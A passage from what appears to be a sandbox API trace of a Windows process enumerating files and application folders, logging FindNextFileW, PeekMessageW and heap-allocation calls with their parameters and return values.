HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0217.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.159] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1722d2f0, ftCreationTime.dwHighDateTime=0x1d5eaeb, ftLastAccessTime.dwLowDateTime=0x8d8a7750, ftLastAccessTime.dwHighDateTime=0x1d5ed56, ftLastWriteTime.dwLowDateTime=0x8d8a7750, ftLastWriteTime.dwHighDateTime=0x1d5ed56, nFileSizeHigh=0x0, nFileSizeLow=0x67e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="K KvEQBDpvTatLEa.swf", cAlternateFileName="KKVEQB~1.SWF")) returned 1 [0217.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.160] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d0bb030, ftCreationTime.dwHighDateTime=0x1d5e5c3, ftLastAccessTime.dwLowDateTime=0x3fa8d630, ftLastAccessTime.dwHighDateTime=0x1d5e50e, ftLastWriteTime.dwLowDateTime=0x3fa8d630, ftLastWriteTime.dwHighDateTime=0x1d5e50e, nFileSizeHigh=0x0, nFileSizeLow=0xb0ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="ljcsRI_.swf", cAlternateFileName="")) returned 1 [0217.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.160] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cdcf0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd35c70fc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe53cf090, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 1 [0217.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.160] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0217.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd8b64ce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58df110, ftCreationTime.dwHighDateTime=0x1d5e230, ftLastAccessTime.dwLowDateTime=0xb26a8a90, ftLastAccessTime.dwHighDateTime=0x1d5e759, ftLastWriteTime.dwLowDateTime=0xb26a8a90, ftLastWriteTime.dwHighDateTime=0x1d5e759, nFileSizeHigh=0x0, nFileSizeLow=0x2641, dwReserved0=0x0, dwReserved1=0x0, cFileName="MWbKfh.gif", cAlternateFileName="")) returned 1 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117382d0, ftCreationTime.dwHighDateTime=0x1d5ec96, ftLastAccessTime.dwLowDateTime=0xce495400, ftLastAccessTime.dwHighDateTime=0x1d5ef72, ftLastWriteTime.dwLowDateTime=0xce495400, ftLastWriteTime.dwHighDateTime=0x1d5ef72, nFileSizeHigh=0x0, nFileSizeLow=0x14af9, dwReserved0=0x0, dwReserved1=0x0, cFileName="NRdQ.m4a", cAlternateFileName="")) returned 1 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.163] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41883640, ftCreationTime.dwHighDateTime=0x1d5e97c, ftLastAccessTime.dwLowDateTime=0xeefa6880, ftLastAccessTime.dwHighDateTime=0x1d5ea02, ftLastWriteTime.dwLowDateTime=0xeefa6880, ftLastWriteTime.dwHighDateTime=0x1d5ea02, nFileSizeHigh=0x0, nFileSizeLow=0xd180, dwReserved0=0x0, dwReserved1=0x0, cFileName="P22ObdW9p9DNX.mkv", cAlternateFileName="P22OBD~1.MKV")) returned 1 [0217.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.163] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58ea2b20, ftCreationTime.dwHighDateTime=0x1d5ef19, ftLastAccessTime.dwLowDateTime=0x97626bc0, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0x97626bc0, ftLastWriteTime.dwHighDateTime=0x1d5e5c7, nFileSizeHigh=0x0, nFileSizeLow=0x7aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="pROXe.ods", cAlternateFileName="")) returned 1 [0217.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.164] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97044220, ftCreationTime.dwHighDateTime=0x1d5eb99, ftLastAccessTime.dwLowDateTime=0x6b312db0, ftLastAccessTime.dwHighDateTime=0x1d5eb4a, ftLastWriteTime.dwLowDateTime=0x6b312db0, ftLastWriteTime.dwHighDateTime=0x1d5eb4a, nFileSizeHigh=0x0, nFileSizeLow=0x1245c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PXFkhPM.gif", cAlternateFileName="")) returned 1 [0217.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.164] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefebe90, ftCreationTime.dwHighDateTime=0x1d5e35c, ftLastAccessTime.dwLowDateTime=0xdc66c0d0, ftLastAccessTime.dwHighDateTime=0x1d5e8d4, ftLastWriteTime.dwLowDateTime=0xdc66c0d0, ftLastWriteTime.dwHighDateTime=0x1d5e8d4, nFileSizeHigh=0x0, nFileSizeLow=0xd667, dwReserved0=0x0, dwReserved1=0x0, cFileName="qFOBP8FwJiuKVs.avi", cAlternateFileName="QFOBP8~1.AVI")) returned 1 [0217.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.164] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e6e240, ftCreationTime.dwHighDateTime=0x1d5ef13, ftLastAccessTime.dwLowDateTime=0xf39202f0, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0xf39202f0, ftLastWriteTime.dwHighDateTime=0x1d5e2b8, nFileSizeHigh=0x0, nFileSizeLow=0x3eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="R2j101Rhh.mp4", cAlternateFileName="R2J101~1.MP4")) returned 1 [0217.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Skype", cAlternateFileName="")) returned 1 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc323cf70, ftCreationTime.dwHighDateTime=0x1d5e251, ftLastAccessTime.dwLowDateTime=0x7f105300, ftLastAccessTime.dwHighDateTime=0x1d5e5e7, ftLastWriteTime.dwLowDateTime=0x7f105300, ftLastWriteTime.dwHighDateTime=0x1d5e5e7, nFileSizeHigh=0x0, nFileSizeLow=0x15f46, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXuB6gyi89__NoT9.swf", cAlternateFileName="TXUB6G~1.SWF")) returned 1 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b742c0, ftCreationTime.dwHighDateTime=0x1d5f067, ftLastAccessTime.dwLowDateTime=0x2d91d700, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0x2d91d700, ftLastWriteTime.dwHighDateTime=0x1d5e37c, nFileSizeHigh=0x0, nFileSizeLow=0x11111, dwReserved0=0x0, dwReserved1=0x0, cFileName="UR7Y.png", cAlternateFileName="")) returned 1 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b87c5f0, ftCreationTime.dwHighDateTime=0x1d5e7ff, ftLastAccessTime.dwLowDateTime=0x4f8ae120, ftLastAccessTime.dwHighDateTime=0x1d5e107, ftLastWriteTime.dwLowDateTime=0x4f8ae120, ftLastWriteTime.dwHighDateTime=0x1d5e107, nFileSizeHigh=0x0, nFileSizeLow=0xccb, dwReserved0=0x0, dwReserved1=0x0, cFileName="vJXjfUq6n4avnAr.avi", cAlternateFileName="VJXJFU~1.AVI")) returned 1 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22717e40, ftCreationTime.dwHighDateTime=0x1d5f054, ftLastAccessTime.dwLowDateTime=0xa6d7d3c0, ftLastAccessTime.dwHighDateTime=0x1d5ee59, ftLastWriteTime.dwLowDateTime=0xa6d7d3c0, ftLastWriteTime.dwHighDateTime=0x1d5ee59, nFileSizeHigh=0x0, nFileSizeLow=0xe9fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="yYa4EeIK4zJ1bJ59OB.rtf", cAlternateFileName="YYA4EE~1.RTF")) returned 1 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.167] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49221180, ftCreationTime.dwHighDateTime=0x1d5ed25, ftLastAccessTime.dwLowDateTime=0xc9d842b0, ftLastAccessTime.dwHighDateTime=0x1d5e779, 